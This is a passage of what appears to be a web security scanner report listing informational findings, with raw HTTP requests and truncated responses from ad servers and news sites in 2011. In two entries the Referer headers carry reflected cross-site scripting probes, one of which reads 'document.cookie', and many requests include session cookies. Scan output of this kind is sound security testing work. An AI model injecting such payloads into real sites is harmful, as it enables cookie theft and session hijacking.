Referer: http://redcated/APM/iview/267856417/direct;wi.300;hi.250/01/0.9525772058404982?click=http://yads.zedo.com/ads2/c%3Fa=883601%3Bn=826%3Bx=2333%3Bc=826000187,826000187%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=173%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=INmz6woBADYAAHrQ5V4AAACH~010411%3Bsn=951%3Bsc=0%3Bss=2%3Bsi=0%3Bse=1%3Bp%3D8%3Bf%3D1077676%3Bh%3D1037004%3Bk=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 29 Jan 2011 14:31:36 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 505

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3a9e/0/0/%2a/e;
...[SNIP]...

27.33. http://ad.doubleclick.net/adi/N4319.msn/B2087123.382

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4319.msn/B2087123.382

Request

GET /adi/N4319.msn/B2087123.382;sz=300x250;;sz=300x250;ord=113577767?click=http://yads.zedo.com/ads2/c%3Fa=883604%3Bn=826%3Bx=2333%3Bc=826000187,826000187%3Bg=172%3Bi=28%3B1=8%3B2=1%3Bs=173%3Bg=172%3Bm=82%3Bw=47%3Bi=28%3Bu=INmz6woBADYAAHrQ5V4AAACH~010411%3Bsn=951%3Bsc=0%3Bss=2%3Bsi=28%3Bse=1%3Bp%3D8%3Bf%3D1077677%3Bh%3D1037004%3Bk=http://clk.redcated/goiframe/196247635.198101849/267856420/direct/01%3fhref= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://redcated/APM/iview/267856420/direct;wi.300;hi.250/01/0.9113153473008424?click=http://yads.zedo.com/ads2/c%3Fa=883604%3Bn=826%3Bx=2333%3Bc=826000187,826000187%3Bg=172%3Bi=28%3B1=8%3B2=1%3Bs=173%3Bg=172%3Bm=82%3Bw=47%3Bi=28%3Bu=INmz6woBADYAAHrQ5V4AAACH~010411%3Bsn=951%3Bsc=0%3Bss=2%3Bsi=28%3Bse=1%3Bp%3D8%3Bf%3D1077677%3Bh%3D1037004%3Bk=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 29 Jan 2011 02:35:56 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4717

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...

27.34. http://ad.doubleclick.net/adi/N4682.132309.BURSTMEDIA/B4421704.7

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4682.132309.BURSTMEDIA/B4421704.7

Request

GET /adi/N4682.132309.BURSTMEDIA/B4421704.7;sz=300x250;click=http://www.burstnet.com/ads/ad19083a-map.cgi/BCPG174597.252798.300824/VTS=29iU7.jjkA/SZ=300X250A/V=2.3S//REDIRURL=;ord=3925 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net.57389.9231.302br.net/jsi/adi/N4682.132309.BURSTMEDIA/B4421704.7;sz=300x250;click=http://www.burstnet.com/ads/ad19083a-map.cgi/BCPG174597.252798.300824/VTS=29iU7.jjkA/SZ=300X250A/V=2.3S//REDIRURL=;ord=3925?
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Fri, 28 Jan 2011 22:47:59 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 626

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3a9d/4/72/%2a/u
...[SNIP]...

27.35. http://ad.doubleclick.net/adi/N5823.152304.TRADEDESK/B5157804.4

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5823.152304.TRADEDESK/B5157804.4

Request

GET /adi/N5823.152304.TRADEDESK/B5157804.4;sz=728x90;ord=7045426855259476565?;click=http://r.turn.com/r/tpclick/id/VRK9hmVixmGm1AAAcwABAA/3c/http%3A%2F%2Fmedia.fastclick.net%2Fw%2Fclick.here%3Fcid%3D279888%26mid%3D522199%26m%3D1%26sid%3D54393%26c%3D0%26tp%3D5%26forced_click%3D/url/; HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Fri, 28 Jan 2011 23:04:25 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4492

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...

27.36. http://ad.doubleclick.net/adi/N5823.152304.TRADEDESK/B5157804.5

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5823.152304.TRADEDESK/B5157804.5

Request

GET /adi/N5823.152304.TRADEDESK/B5157804.5;sz=300x250;ord=4434400651657365963?;click=http://r.turn.com/r/tpclick/id/y0nM8eUnij0zGgUAaQABAA/3c/http%3A%2F%2Fmedia.fastclick.net%2Fw%2Fclick.here%3Fcid%3D279895%26mid%3D522196%26m%3D6%26sid%3D54393%26c%3D0%26tp%3D8%26forced_click%3D/url/; HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 29 Jan 2011 01:03:25 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4505

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,900 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...

27.37. http://ad.doubleclick.net/adi/N5956.Advertising.com/B3941858.17

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5956.Advertising.com/B3941858.17

Request

GET /adi/N5956.Advertising.com/B3941858.17;sz=728x90;click=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000778478/cstr=67706747=_4d436c28,4382457826,766161%5E778478%5E1183%5E0,1_/xsxdata=$xsxdata/bnum=67706747/optn=64?trg=;ord=4382457826? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 29 Jan 2011 01:23:53 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6488

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...

27.38. http://ad.doubleclick.net.57389.9231.302br.net/jsi/adi/N4682.132309.BURSTMEDIA/B4421704.7

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net.57389.9231.302br.net
Path:   /jsi/adi/N4682.132309.BURSTMEDIA/B4421704.7

Request

GET /jsi/adi/N4682.132309.BURSTMEDIA/B4421704.7;sz=300x250;click=http://www.burstnet.com/ads/ad19083a-map.cgi/BCPG174597.252798.300824/VTS=29iU7.jjkA/SZ=300X250A/V=2.3S//REDIRURL=;ord=3925? HTTP/1.1
Host: ad.doubleclick.net.57389.9231.302br.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=1B2A83185956BA19ABB6FE6E70A6C415; Path=/
Content-Type: text/html
Content-Length: 7169
Date: Fri, 28 Jan 2011 22:47:58 GMT
Connection: close

<html>
<head></head>
<body>
<script type="text/javascript"><!--

var adsafeVisParams = {
   mode : "jsi",
   jsref : "http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Midd
...[SNIP]...

27.39. http://amch.questionmarket.com/adscgen/st.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adscgen/st.php

Request

GET /adscgen/st.php?survey_num=791689&site=57634299&code=39823749&randnum=6941413 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(1)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LP=1296062048; CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-1_39942282-8-1; ES=823529-ie.pM-MG_844890-`:tqM-0_822109-|RIsM-26_853829-y]GsM-Bi1_847435-l^GsM-!"1

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 14:48:40 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
DL_S: b103.dl
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Content-Length: 165
Content-Type: text/html

(function(){
if(1!=4){
(new Image).src="http://amch.questionmarket.com/adsc/d791689/21/39823749/decide.php?ord="+Math.floor((new Date()).getTime()/1000);


}
})();


27.40. http://assets.nydailynews.com/img/2011/01/26/205x120-gthmb_no_makeup_menounos.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://assets.nydailynews.com
Path:   /img/2011/01/26/205x120-gthmb_no_makeup_menounos.jpg

Request

GET /img/2011/01/26/205x120-gthmb_no_makeup_menounos.jpg HTTP/1.1
Host: assets.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 400 Bad Request
Server: Apache
Content-Length: 69
Cneonction: close
Content-Type: text/html
Content-Language: en
Age: 8
Date: Fri, 28 Jan 2011 14:14:30 GMT
Expires: Fri, 28 Jan 2011 14:14:32 GMT
Connection: keep-alive

/apps/web1/apache2/htdocs/img/2011/01/26/gthmb_no_makeup_menounos.jpg

27.41. http://b3.mookie1.com/2/B3DM/DLX/1@x71

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/B3DM/DLX/1@x71

Request

GET /2/B3DM/DLX/1@x71 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/2010DM/11711169344@x23?USNetwork/RS_SELL_2011Q1_TF_CT_728
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; NSC_o4efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660; dlx_20100929=set; other_20110126=set; session=1296224086|1296224086

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 14:14:48 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 784
Content-Type: text/html

<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e);
}
var ZAP_id=cookie_c
...[SNIP]...

27.42. http://b3.mookie1.com/2/CollectiveB3/ATTWL/11Q1/MobRON/300/1[timestamp]@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/CollectiveB3/ATTWL/11Q1/MobRON/300/1[timestamp]@x90

Request

GET /2/CollectiveB3/ATTWL/11Q1/MobRON/300/1[timestamp]@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_o4efm_qppm_iuuq=ffffffff09419e2a45525d5f4f58455e445a4a423660; session=1296251852|1296251875

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:58:10 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 514
Content-Type: text/html

<SCRIPT TYPE="text/javascript" language="JavaScript">
var B3d=new Date();
var B3m=B3d.getTime();
B3d.setTime(B3m+30*24*60*60*1000);
document.cookie="ATTWL=CollectiveB3;expires="+B3d.toGMTString()+";pa
...[SNIP]...

27.43. http://b3.mookie1.com/2/CollectiveB3/ATTWL/11Q1/MobRON/300/1[timestamp]@x90/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/CollectiveB3/ATTWL/11Q1/MobRON/300/1[timestamp]@x90/

Request

GET /2/CollectiveB3/ATTWL/11Q1/MobRON/300/1[timestamp]@x90/ HTTP/1.1
Host: b3.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; other_20110126=set; NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660; dlx_20100929=set; id=914803576615380; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; session=1296256112|1296264723; OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; ATTWL=CollectiveB3;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:21:26 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 317
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e5045525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/CollectiveB3/ATTWL/11Q1/MobRON/300/1[timestamp]/2045287019/x90//default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><IMG SRC="
...[SNIP]...

27.44. http://base.liveperson.net/visitor/addons/deploy.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://base.liveperson.net
Path:   /visitor/addons/deploy.asp

Request

GET /visitor/addons/deploy.asp HTTP/1.1
Host: base.liveperson.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: HumanClickKEY=6680227135865200365; LivePersonID=LP i=16101423669632,d=1294435351; HumanClickACTIVE=1296223153625; ASPSESSIONIDCCQTSCAT=MAKLFIOAFLPGILKCPJFPHGPG; HumanClickSiteContainerID_5296924=Secondary1;

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Fri, 28 Jan 2011 14:11:04 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Content-Length: 403
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQQRSRACD=JNCEGDPBHJJHHAPHDMHAOKLH; path=/
Cache-control: private

<font face="Arial" size=2>
<p>Server.MapPath()</font> <font face="Arial" size=2>error 'ASP 0174 : 80004005'</font>
<p>
<font face="Arial" size=2>Invalid Path Character(s)</font>
<p>
<font face="Arial
...[SNIP]...

27.45. https://base.liveperson.net/hcp/html/blankhtml.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://base.liveperson.net
Path:   /hcp/html/blankhtml.html

Request

GET /hcp/html/blankhtml.html HTTP/1.1
Host: base.liveperson.net
Connection: keep-alive
Referer: https://base.liveperson.net/hc/5296924/?cmd=file&file=chatFrame&site=5296924&SV!chat-button-name=chat-seo-campaign1&SV!chat-button-room=chat-seo-campaign1&referrer=(button%20dynamic-button:chat-seo-campaign1(Live%20Chat%20by%20LivePerson))%20http%3A//solutions.liveperson.com/live-chat/C1/%3Futm_source%3Dbing%26utm_medium%3Dcpc%26utm_keyword%3Dlive%2520chat%26utm_campaign%3Dchat%2520-us&SESSIONVAR!skill=Sales&sessionkey=H6680227135865200365-3761611791040242971K15949386
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=16101423669632,d=1294435351; ASPSESSIONIDCCQTSCAT=MAKLFIOAFLPGILKCPJFPHGPG; HumanClickACTIVE=1296223153625

Response

HTTP/1.1 200 OK
Content-Length: 28
Content-Type: text/html
Content-Location: https://base.liveperson.net/hcp/html/blankhtml.html
Last-Modified: Thu, 30 Dec 2010 17:06:51 GMT
Accept-Ranges: bytes
ETag: "e28dbf343a8cb1:112a"
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Date: Fri, 28 Jan 2011 14:06:46 GMT

<html><body></body></html>

27.46. http://bh.heraldinteractive.com/includes/processAds.bg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bh.heraldinteractive.com
Path:   /includes/processAds.bg

Request

GET /includes/processAds.bg?position=Middle&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome HTTP/1.1
Host: bh.heraldinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:57:28 GMT
Server: Apache/2.2.4 (Unix) PHP/5.2.0-8+etch11
X-Powered-By: PHP/5.2.0-8+etch11
Content-Length: 1867
Connection: close
Content-Type: text/html


<style type="text/css">
   /* div { top: 0px; } */
</style>


<!--- 1st Section: Delivery Attempt via JX tag. --->
<SCRIPT LANGUAGE="JavaScript1.1" SRC="http://oascentral.bostonherald.com/Rea
...[SNIP]...

27.47. http://boston30.autochooser.com/results.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://boston30.autochooser.com
Path:   /results.asp

Request

GET /results.asp?gid=0&pagename=dealersearch.asp&resulttype=2&postto=results.asp HTTP/1.1
Host: boston30.autochooser.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:21:31 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON DSP COR CURa ADMa DEVa TAIa OUR SAMa IND", POLICYREF="URI"
Content-Type: text/html
Expires: Fri, 28 Jan 2011 05:20:30 GMT
Set-Cookie: cid=4473401; expires=Tue, 25-Dec-2012 05:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDSSQCBSCQ=ILBLDIICKPOMNHFEBBFBBIPG; path=/
Cache-control: private
Content-Length: 74164


<HTML>
<HEAD>
<TITLE>Quick Search</TITLE>
<META NAME="ROBOTS" CONTENT="NOFOLLOW">
<script language="JavaScript">
<!--

   function saveFavorites() {
       if (document.results) {
           document.resu
...[SNIP]...

27.48. http://br.imlive.com/NaN/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://br.imlive.com
Path:   /NaN/

Request

GET /NaN/ HTTP/1.1
Host: br.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: spvdr=vd=4fe45243-c119-4c27-af24-3a1035e21f79&sgid=0&tid=0; __utmz=90051912.1296227188.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; BIGipServerlanguage.imlive.com=2215904834.20480.0000; ibr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; __utma=90051912.2015373959.1296227188.1296227188.1296227188.1; __utmc=90051912; __utmb=90051912.1.10.1296227188; ASP.NET_SessionId=robavyerei5nryejqqx3qs45;

Response

HTTP/1.1 500 Server Error
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 16:44:36 GMT
Connection: close
Content-Length: 63

<html><body><h1> HTTP/1.1 New Session Failed</h1></body></html>

27.49. http://bs.serving-sys.com/BurstingPipe/adServer.bs

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=1891435&PluID=0&w=728&h=90&ord=2784774291777236223&ucm=true&ncu=http://r.turn.com/r/formclick/id/_6wFyXaBpSZSDgIAZwABAA/url/ HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.cbs6albany.com/sections/thirdParty/iframe_header/?domain=events.cbs6albany.com&cname=zvents&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7Cevent&taxonomy=entertainment&trackstats=no
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u3=1; C4=; eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; A3=gn3Ka4JO09MY00001gNfHaaiN0aVX00001fU+La50V0a+r00001fUFGa50V02WG00001cRreabeg03Dk00001gy7La9bU0c9M00003gy5Da9bU0c9M00001gCTVa9bU0c9M00001; B3=7lgH0000000001sG852G0000000003sS83xP0000000001sF8cVQ0000000001sV6o.Q0000000001sY7gi30000000001sG852z0000000001sS852A0000000001sS; u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; expires=Thu, 28-Apr-2011 12:37:31 GMT; domain=bs.serving-sys.com; path=/
